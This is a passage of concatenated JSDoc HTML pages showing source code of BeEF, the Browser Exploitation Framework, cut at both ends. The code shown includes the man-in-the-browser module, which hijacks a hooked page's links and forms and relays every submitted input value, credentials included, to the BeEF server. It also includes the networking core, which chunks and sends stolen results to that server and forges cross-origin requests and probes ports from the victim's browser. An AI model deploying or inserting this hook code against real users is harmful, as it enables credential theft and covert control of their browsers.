beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
});
beef.onclose.push(function (event) {
beef.mitb.endSession();
});
var anchors = document.getElementsByTagName("a");
var forms = document.getElementsByTagName("form");
var lis = document.getElementsByTagName("li");
for (var i = 0; i < anchors.length; i++) {
anchors[i].onclick = beef.mitb.poisonAnchor;
}
for (var i = 0; i < forms.length; i++) {
beef.mitb.poisonForm(forms[i]);
}
for (var i = 0; i < lis.length; i++) {
if (lis[i].hasAttribute("onclick")) {
lis[i].removeAttribute("onclick");
/*clear*/
lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick('" + lis[i].getElementsByTagName("a")[0] + "')");
/*override*/
}
}
},
/** Hooks anchors and prevents them from linking away */
poisonAnchor:function (e) {
try {
e.preventDefault;
if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be:"EF" }, title, e.currentTarget);
}
} catch (e) {
beef.debug('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
}
return false;
},
/** Hooks forms and prevents them from linking away */
poisonForm:function (form) {
form.onsubmit = function (e) {
// Collect <input> tags.
var inputs = form.getElementsByTagName("input");
var query = "";
for (var i = 0; i < inputs.length; i++) {
switch (inputs[i].type) {
case "submit":
break;
default:
query += inputs[i].name + "=" + inputs[i].value + '&';
break;
}
}
// Collect selected options from the form.
var selects = form.getElementsByTagName("select");
for (var i = 0; i < selects.length; i++) {
var select = selects[i];
query += select.name + "=" + select.options[select.selectedIndex].value + '&';
}
// We should be gathering 'submit' inputs as well, as there are
// applications demanding this parameter.
var submit = $j('*[type="submit"]', form);
if(submit.length) {
// Append name of the submit button/input.
query += submit.attr('name') + '=' + submit.attr('value');
}
if(query.slice(-1) == '&') {
query = query.slice(0, -1);
}
e.preventdefault;
beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
history.pushState({ Be:"EF" }, "", form.action);
return false;
}
},
/** Fetches a hooked form with AJAX */
fetchForm:function (url, query, target) {
try {
var y = new XMLHttpRequest();
y.open('POST', url, false, true);
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
};
y.send(query);
beef.mitb.sniff("POST: " + url + "[" + query + "]");
return true;
} catch (x) {
return false;
}
},
/** Fetches a hooked link with AJAX */
fetch:function (url, target) {
try {
var y = new XMLHttpRequest();
y.open('GET', url, false, true);
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
};
y.send(null);
beef.mitb.sniff("GET: " + url);
return true;
} catch (x) {
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
return false;
}
},
/** Fetches a window.location=http://domainname.com and setting up history */
fetchOnclick:function (url) {
try {
var target = document.getElementsByTagName("html")[0];
var y = new XMLHttpRequest();
y.open('GET', url, false, true);
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
}
else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be:"EF" }, title, url);
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
};
y.send(null);
beef.mitb.sniff("GET: " + url);
} catch (x) {
// the link is cross-origin, so load the resource in a different tab
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
}
},
/** Relays an entry to the framework */
sniff:function (result) {
try {
beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
} catch (x) {
}
return true;
},
/** Signals the Framework that the user has lost the hook */
endSession:function () {
beef.mitb.sniff("Window closed.");
}
};
beef.regCmp('beef.mitb');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/net.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides basic networking functions,
* like beef.net.request and beef.net.forgeRequest,
* used by BeEF command modules and the Requester extension,
* as well as beef.net.send which is used to return commands
* to BeEF server-side components.
*
* Also, it contains the core methods used by the XHR-polling
* mechanism (flush, queue)
* @namespace beef.net
*
*/
beef.net = {
host: "<%= @beef_host %>",
port: "<%= @beef_port %>",
hook: "<%= @beef_hook %>",
httpproto: "<%= @beef_proto %>",
handler: '/dh',
chop: 500,
pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
sid_count: 0,
cmd_queue: [],
/**
* Command object. This represents the data to be sent back to BeEF,
* using the beef.net.send() method.
*/
command: function () {
this.cid = null;
this.results = null;
this.status = null;
this.handler = null;
this.callback = null;
},
/**
* Packet object. A single chunk of data. X packets -> 1 stream
*/
packet: function () {
this.id = null;
this.data = null;
},
/**
* Stream object. Contains X packets, which are command result chunks.
*/
stream: function () {
this.id = null;
this.packets = [];
this.pc = 0;
this.get_base_url_length = function () {
return (this.url + this.handler + '?' + 'bh=' + beef.session.get_hook_session_id()).length;
};
this.get_packet_data = function () {
var p = this.packets.shift();
return {'bh': beef.session.get_hook_session_id(), 'sid': this.id, 'pid': p.id, 'pc': this.pc, 'd': p.data }
};
},
/**
* Response Object - used in the beef.net.request callback
* NOTE: as we are using async mode, the response object will be empty if returned.
* Using sync mode, request obj fields will be populated.
*/
response: function () {
this.status_code = null; // 500, 404, 200, 302
this.status_text = null; // success, timeout, error, ...
this.response_body = null; // "<html>…." if not a cross-origin request
this.port_status = null; // tcp port is open, closed or not http
this.was_cross_domain = null; // true or false
this.was_timedout = null; // the user specified timeout was reached
this.duration = null; // how long it took for the request to complete
this.headers = null; // full response headers
},
/**
* Queues the specified command results.
* @param {String} handler the server-side handler that will be called
* @param {Integer} cid command id
* @param {String} results the data to send
* @param {Integer} status the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
* @param {Function} callback the function to call after execution
*/
queue: function (handler, cid, results, status, callback) {
if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
var s = new beef.net.command();
s.cid = cid;
s.results = beef.net.clean(results);
s.status = status;
s.callback = callback;
s.handler = handler;
this.cmd_queue.push(s);
}
},
/**
* Queues the current command results and flushes the queue straight away.
* NOTE: Always send Browser Fingerprinting results
* (beef.net.browser_details(); -> /init handler) using normal XHR-polling,
* even if WebSockets are enabled.
* @param {String} handler the server-side handler that will be called
* @param {Integer} cid command id
* @param {String} results the data to send
* @param {Integer} exec_status the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
* @param {Function} callback the function to call after execution
* @return {Integer} the command module execution status (defaults to 0 - 'unknown' if status is null)
*/
send: function (handler, cid, results, exec_status, callback) {
// defaults to 'unknown' execution status if no parameter is provided, otherwise set the status
var status = 0;
if (exec_status != null && parseInt(Number(exec_status)) == exec_status){ status = exec_status}
if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
this.queue(handler, cid, results, status, callback);
this.flush();
} else {
try {
beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
'", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
'", "status": "' + exec_status +
'", "callback": "' + callback +
'","bh":"' + beef.session.get_hook_session_id() + '" }');
} catch (e) {
this.queue(handler, cid, results, status, callback);
this.flush();
}
}
return status;
},
/**
* Flush all currently queued command results to the framework,
* chopping the data in chunks ('chunk' method) which will be re-assembled
* server-side by the network stack.
* NOTE: currently 'flush' is used only with the default
* XHR-polling mechanism. If WebSockets are used, the data is sent
* back to BeEF straight away.
*/
flush: function (callback) {
if (this.cmd_queue.length > 0) {
var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
this.cmd_queue.length = 0;
this.sid_count++;
var stream = new this.stream();
stream.id = this.sid_count;
var pad = stream.get_base_url_length() + this.pad;
//cant continue if chop amount is too low
if ((this.chop - pad) > 0) {
var data = this.chunk(data, (this.chop - pad));
for (var i = 1; i <= data.length; i++) {
var packet = new this.packet();
packet.id = i;
packet.data = data[(i - 1)];
stream.packets.push(packet);
}
stream.pc = stream.packets.length;
this.push(stream, callback);
}
} else {
if ((typeof callback != 'undefined') && (callback != null)) {
callback();
}
}
},
/**
* Split the input data into chunk lengths determined by the amount parameter.
* @param {String} str the input data
* @param {Integer} amount chunk length
*/
chunk: function (str, amount) {
if (typeof amount == 'undefined') n = 2;
return str.match(RegExp('.{1,' + amount + '}', 'g'));
},
/**
* Push the input stream back to the BeEF server-side components.
* It uses beef.net.request to send back the data.
* @param {Object} stream the stream object to be sent back.
*/
push: function (stream, callback) {
//need to implement wait feature here eventually
if (typeof callback === 'undefined') {
callback = null;
}
for (var i = 0; i < stream.pc; i++) {
var cb = null;
if (i == (stream.pc - 1)) {
cb = callback;
}
this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null,
stream.get_packet_data(), 10, 'text', cb);
}
},
/**
* Performs http requests
* @param {String} scheme HTTP or HTTPS
* @param {String} method GET or POST
* @param {String} domain bindshell.net, 192.168.3.4, etc
* @param {Int} port 80, 5900, etc
* @param {String} path /path/to/resource
* @param {String} anchor this is the value that comes after the # in the URL
* @param {String} data This will be used as the query string for a GET or post data for a POST
* @param {Int} timeout timeout the request after N seconds
* @param {String} dataType specify the data return type expected (ie text/html/script)
* @param {Function} callback call the callback function at the completion of the method
*
* @return {Object} this object contains the response details
*/
request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
//check if same domain or cross domain
var cross_domain = true;
if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
if (document.location.port == "" || document.location.port == null) {
cross_domain = !(port == "80" || port == "443");
}
}
//build the url
var url = "";
if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
url = path;
} else {
url = scheme + "://" + domain;
url = (port != null) ? url + ":" + port : url;
url = (path != null) ? url + path : url;
url = (anchor != null) ? url + "#" + anchor : url;
}
//define response object
var response = new this.response;
response.was_cross_domain = cross_domain;
var start_time = new Date().getTime();
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST") {
$j.ajaxSetup({
dataType: dataType
});
} else {
$j.ajaxSetup({
dataType: 'script'
});
}
//build and execute the request
$j.ajax({type: method,
url: url,
data: data,
timeout: (timeout * 1000),
//This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
beforeSend: function (xhr) {
if (method == "POST") {
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
}
},
success: function (data, textStatus, xhr) {
var end_time = new Date().getTime();
response.status_code = xhr.status;
response.status_text = textStatus;
response.response_body = data;
response.port_status = "open";
response.was_timedout = false;
response.duration = (end_time - start_time);
},
error: function (jqXHR, textStatus, errorThrown) {
var end_time = new Date().getTime();
response.response_body = jqXHR.responseText;
response.status_code = jqXHR.status;
response.status_text = textStatus;
response.duration = (end_time - start_time);
response.port_status = "open";
},
complete: function (jqXHR, textStatus) {
response.status_code = jqXHR.status;
response.status_text = textStatus;
response.headers = jqXHR.getAllResponseHeaders();
// determine if TCP port is open/closed/not-http
if (textStatus == "timeout") {
response.was_timedout = true;
response.response_body = "ERROR: Timed out\n";
response.port_status = "closed";
} else if (textStatus == "parsererror") {
response.port_status = "not-http";
} else {
response.port_status = "open";
}
}
}).always(function () {
if (callback != null) {
callback(response);
}
});
return response;
},
/**
* Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
* - requestid: needed on the callback
* - allowCrossDomain: set cross-domain requests as allowed or blocked
*
* forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
* Example usage:
* beef.net.forge_request("http", "POST", "172.20.40.50", 8080, "/lulz",
* true, null, { foo: "bar" }, 5, 'html', false, null, function(response) {
* alert(response.response_body)})
*/
forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
if (domain == "undefined" || path == "undefined") {
beef.debug("[beef.net.forge_request] Error: Malformed request. No host specified.");
return;
}
// check if same domain or cross domain
var cross_domain = true;
if (document.domain == domain && document.location.protocol == scheme + ':') {
if (document.location.port == "" || document.location.port == null) {
cross_domain = !(port == "80" || port == "443");
} else {
if (document.location.port == port) cross_domain = false;
}
}
// build the url
var url = "";
if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
url = path;
} else {
url = scheme + "://" + domain;
url = (port != null) ? url + ":" + port : url;
url = (path != null) ? url + path : url;
url = (anchor != null) ? url + "#" + anchor : url;
}
// define response object
var response = new this.response;
response.was_cross_domain = cross_domain;
var start_time = new Date().getTime();
// if cross-domain requests are not allowed and the request is cross-domain
// don't proceed and return
if (allowCrossDomain == "false" && cross_domain) {
beef.debug("[beef.net.forge_request] Error: Cross Domain Request. The request was not sent.");
response.status_code = -1;
response.status_text = "crossdomain";
response.port_status = "crossdomain";
response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
if (callback != null) callback(response, requestid);
return response;
}
// if the request was cross-domain from a HTTPS origin to HTTP
// don't proceed and return
if (document.location.protocol == 'https:' && scheme == 'http') {
beef.debug("[beef.net.forge_request] Error: Mixed Active Content. The request was not sent.");
response.status_code = -1;
response.status_text = "mixedcontent";
response.port_status = "mixedcontent";
response.response_body = "ERROR: Mixed Active Content. The request was not sent.\n";
response.headers = "ERROR: Mixed Active Content. The request was not sent.\n";
if (callback != null) callback(response, requestid);
return response;
}
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST") {
$j.ajaxSetup({
dataType: dataType
});
} else {
$j.ajaxSetup({
dataType: 'script'
});
}
// this is required for bugs in IE so data can be transferred back to the server
if (beef.browser.isIE()) {
dataType = 'script'
}
$j.ajax({type: method,
dataType: dataType,
url: url,
headers: headers,
timeout: (timeout * 1000),
//This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
beforeSend: function (xhr) {
if (method == "POST") {
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
}
},
data: data,
// http server responded successfully
success: function (data, textStatus, xhr) {
var end_time = new Date().getTime();
response.status_code = xhr.status;
response.status_text = textStatus;
response.response_body = data;
response.was_timedout = false;
response.duration = (end_time - start_time);
},
// server responded with a http error (403, 404, 500, etc)
// or server is not a http server
error: function (xhr, textStatus, errorThrown) {
var end_time = new Date().getTime();
response.response_body = xhr.responseText;
response.status_code = xhr.status;
response.status_text = textStatus;
response.duration = (end_time - start_time);
},
complete: function (xhr, textStatus) {
// cross-domain request
if (cross_domain) {
response.port_status = "crossdomain";
if (xhr.status != 0) {
response.status_code = xhr.status;
} else {
response.status_code = -1;
}
if (textStatus) {
response.status_text = textStatus;
} else {
response.status_text = "crossdomain";
}
if (xhr.getAllResponseHeaders()) {
response.headers = xhr.getAllResponseHeaders();
} else {
response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
}
if (!response.response_body) {
response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
}
} else {
// same-domain request
response.status_code = xhr.status;
response.status_text = textStatus;
response.headers = xhr.getAllResponseHeaders();
// determine if TCP port is open/closed/not-http
if (textStatus == "timeout") {
response.was_timedout = true;
response.response_body = "ERROR: Timed out\n";
response.port_status = "closed";
/*
* With IE we need to explicitly set the dataType to "script",
* so there will be always parse-errors if the content is != javascript
* */
} else if (textStatus == "parsererror") {
response.port_status = "not-http";
if (beef.browser.isIE()) {
response.status_text = "success";
response.port_status = "open";
}
} else {
response.port_status = "open";
}
}
callback(response, requestid);
}
});
return response;
},
/** this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
* http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/
*/
clean: function (r) {
if (this.array_has_string_key(r)) {
var obj = {};
for (var key in r)
obj[key] = (this.array_has_string_key(obj[key])) ? this.clean(r[key]) : r[key];
return obj;
}
return r;
},
/** Detects if an array has a string key */
array_has_string_key: function (arr) {
if ($j.isArray(arr)) {
try {
for (var key in arr)
if (isNaN(parseInt(key))) return true;
} catch (e) {
}
}
return false;
},
/**
* Checks if the specified port is valid
*/
is_valid_port: function (port) {
if (isNaN(port)) return false;
if (port > 65535 || port < 0) return false;
return true;
},
/**
* Checks if the specified IP address is valid
*/
is_valid_ip: function (ip) {
if (ip == null) return false;
var ip_match = ip.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (ip_match == null) return false;
return true;
},
/**
* Checks if the specified IP address range is valid
*/
is_valid_ip_range: function (ip_range) {
if (ip_range == null) return false;
var range_match = ip_range.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range_match == null || range_match[1] == null) return false;
return true;
},
/**
* Sends back browser details to framework, calling beef.browser.getDetails()
*/
browser_details: function () {
var details = beef.browser.getDetails();
var res = null;
details['HookSessionID'] = beef.session.get_hook_session_id();
this.send('/init', 0, details);
if(details != null)
res = true;
return res;
}
};
beef.regCmp('beef.net');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/net_connection.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net/connection.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net/connection.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* beef.net.connection - wraps Mozilla's Network Information API
* https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation
* https://developer.mozilla.org/en-US/docs/Web/API/Navigator/connection
* @namespace beef.net.connection
*/
beef.net.connection = {
/**
* Returns the connection type. https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/type
* @example beef.net.connection.type()
* @return {String} connection type or 'unknown'.
*/
type: function () {
try {
var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
var type = connection.type;
if (/^[a-z]+$/.test(type)) return type; else return 'unknown';
} catch(e) {
beef.debug("Error retrieving connection type: " + e.message);
return 'unknown';
}
},
/**
* Returns the maximum downlink speed of the connection. https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/downlinkMax
* @example beef.net.connection.downlinkMax()
* @return {String} downlink max or 'unknown'.
*/
downlinkMax: function () {
try {
var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
var max = connection.downlinkMax;
if (max) return max; else return 'unknown';
} catch(e) {
beef.debug("Error retrieving connection downlink max: " + e.message);
return 'unknown';
}
}
};
beef.regCmp('beef.net.connection');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/net_cors.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net/cors.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net/cors.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>/**
* @namespace beef.net.cors
*/
beef.net.cors = {
handler: "cors",
/**
* Response Object - used in the beef.net.request callback
*/
response:function () {
this.status = null; // 500, 404, 200, 302, etc
this.headers = null; // full response headers
this.body = null; // full response body
},
/**
* Make a cross-origin request using CORS
*
* @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
* @param url {String} url
* @param data {String} request body
* @param timeout {Integer} request timeout in milliseconds
* @param callback {Function} function to callback on completion
*/
request: function(method, url, data, timeout, callback) {
var xhr;
var response = new this.response;
if (XMLHttpRequest) {
xhr = new XMLHttpRequest();
if ('withCredentials' in xhr) {
xhr.open(method, url, true);
xhr.timeout = parseInt(timeout, 10);
xhr.onerror = function() {
};
xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
response.headers = this.getAllResponseHeaders()
response.body = this.responseText;
response.status = this.status;
if (!!callback) {
if (!!response) {
callback(response);
} else {
callback('ERROR: No Response. CORS requests may be denied for this resource.')
}
}
}
};
xhr.send(data);
}
} else if (typeof XDomainRequest != "undefined") {
xhr = new XDomainRequest();
xhr.open(method, url);
xhr.onerror = function() {
};
xhr.onload = function() {
response.headers = this.getAllResponseHeaders()
response.body = this.responseText;
response.status = this.status;
if (!!callback) {
if (!!response) {
callback(response);
} else {
callback('ERROR: No Response. CORS requests may be denied for this resource.')
}
}
};
xhr.send(data);
} else {
if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.');
}
}
};
beef.regCmp('beef.net.cors');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/net_dns.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net/dns.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
